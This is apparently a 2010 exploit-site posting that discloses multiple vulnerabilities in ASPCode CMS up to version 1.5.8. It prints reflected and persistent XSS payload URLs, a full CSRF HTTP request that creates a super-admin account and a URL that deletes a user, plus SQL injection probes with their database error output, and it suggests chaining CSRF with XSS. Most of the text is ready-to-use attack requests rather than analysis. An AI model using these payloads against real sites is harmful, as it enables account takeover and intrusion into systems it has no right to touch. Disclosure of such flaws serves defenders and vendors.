ASPCode CMS <= v1.5.8 Multiple Vulnerabilities

Posted on 30 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ASPCode CMS &lt;= v1.5.8 Multiple Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================
ASPCode CMS &lt;= v1.5.8 Multiple Vulnerabilities
==============================================

# Multiple Vulnerability in ASPCode CMS
#
# [Software Version]: &lt;= v1.5.8
# [Vendor WebSite]: www.aspcodecms.com
# [Date]: 01 January 2010
#
# Found by Alberto &quot;fulgur&quot; Fontanella
#
# itsicurezza&lt;0x40&gt;yahoo.it - ictsec.wordpress.com
#
#
 
 
[1] - [Multiple XSS Vulnerability]
 
   http://[host]/default.asp?sec=1&amp;ma1=&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;
 
   http://[host]/default.asp?sec=1&amp;tag=&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;
 
   http://[host]/default.asp?sec=1&amp;ma2=&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;
 
   XSS found also on Form to reset password: http://[host]/default.asp?sec=33&amp;ma1=forgotpass
    
   Put XSS String in Email Field and Submit it
 
 
[2] - [Persistent XSS]
 
   Post in Guestbook Section: http://[host]/default.asp?sec=23
 
   &lt;img src=&quot;http://[host]/default.asp?sec=1&amp;ma1=&quot;&gt;&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;&quot;&gt;&lt;/img&gt;
 
 
[3] - [CSRF]
 
   To Delete an User Account
 
   http://[host]/default.asp?a1=admin&amp;a2=modules&amp;a3=manage&amp;module=users&amp;ma1=users&amp;ma2=delete&amp;idx=50
 
   To Create a Super Admin Account
 
   POST /default.asp?a1=admin&amp;a2=modules&amp;a3=manage&amp;module=users&amp;ma1=users&amp;ma2=update&amp;idx=-1
   HTTP/1.1
   Host: [host]
   User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: en-us,en;q=0.5
   Accept-Encoding: gzip,deflate
   Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
   Keep-Alive: 300
   Connection: keep-alive
   Referer: http://[host]/default.asp?a1=admin&amp;a2=modules&amp;a3=manage&amp;module=users&amp;ma1=users&amp;ma2=edit&amp;idx=-1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 140
 
   username=HAXOR&amp;password=PASSWD&amp;old_password=&amp;password_is_encrypted=false&amp;email=HAXOR%40BLACKHAT.ORG&amp;roleId=4&amp;redirsectionid=0&amp;confirmed=true
    
   You can use CSRF + XSS (Very Dangerous)
 
 
[4] - [Possible SQL Injection]
 
   http://[host]/default.asp?sec=64&amp;ma1=tag&amp;tag=CMS'
 
   Errore numero: -2147217900
   Errore: Errore di sintassi (operatore mancante) nell'espressione della query
   '[ID] IN ()'.
 
   Query:
   SELECT * FROM [section] s WHERE [ID] IN ()
 
 
   http://[host]/default.asp=sec=1'
 
   Errore di run-time di Microsoft VBScript (0x800A000D)
   Tipo non corrispondente: 'sectionID'
   /include/api.asp, line 657


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-30]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20